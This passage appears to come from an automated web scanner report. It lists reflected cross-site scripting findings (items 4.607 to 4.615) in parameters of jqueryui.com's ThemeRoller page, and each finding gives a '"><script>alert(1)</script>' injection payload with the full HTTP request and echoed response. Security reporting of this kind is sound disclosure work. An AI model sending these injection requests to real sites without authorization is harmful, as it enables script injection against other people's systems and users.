ight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
er=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.pnga4afd"><script>alert(1)</script>5ee5c68dd88&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=c
...[SNIP]...

4.607. http://jqueryui.com/themeroller/ [bgTextureHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e499b"><script>alert(1)</script>612f13c5053 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.pnge499b"><script>alert(1)</script>612f13c5053&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:03:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.pnge499b"><script>alert(1)</script>612f13c5053&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconC
...[SNIP]...

4.608. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f025"><script>alert(1)</script>0e1f745eeea was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png4f025"><script>alert(1)</script>0e1f745eeea&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:06:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png4f025"><script>alert(1)</script>0e1f745eeea&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

4.609. http://jqueryui.com/themeroller/ [bgTextureShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89d5c"><script>alert(1)</script>be656200160 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png89d5c"><script>alert(1)</script>be656200160&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:07:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png89d5c"><script>alert(1)</script>be656200160&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

4.610. http://jqueryui.com/themeroller/ [borderColorActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea5f3"><script>alert(1)</script>c758123b355 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaaea5f3"><script>alert(1)</script>c758123b355&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:04:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaaea5f3"><script>alert(1)</script>c758123b355&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColor
...[SNIP]...

4.611. http://jqueryui.com/themeroller/ [borderColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83c49"><script>alert(1)</script>ad9a9cee216 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa83c49"><script>alert(1)</script>ad9a9cee216&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:01:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa83c49"><script>alert(1)</script>ad9a9cee216&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dada
...[SNIP]...

4.612. http://jqueryui.com/themeroller/ [borderColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85965"><script>alert(1)</script>e49abec7f00 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d385965"><script>alert(1)</script>e49abec7f00&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:02:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
1_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d385965"><script>alert(1)</script>e49abec7f00&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextur
...[SNIP]...

4.613. http://jqueryui.com/themeroller/ [borderColorError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21e06"><script>alert(1)</script>8dae9211155 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a21e06"><script>alert(1)</script>8dae9211155&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a21e06"><script>alert(1)</script>8dae9211155&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

4.614. http://jqueryui.com/themeroller/ [borderColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79175"><script>alert(1)</script>f925903eea7 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa79175"><script>alert(1)</script>f925903eea7&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa79175"><script>alert(1)</script>f925903eea7&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e
...[SNIP]...

4.615. http://jqueryui.com/themeroller/ [borderColorHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2395b"><script>alert(1)</script>8ecdffb1e74 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa12395b"><script>alert(1)</script>8ecdffb1e74&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
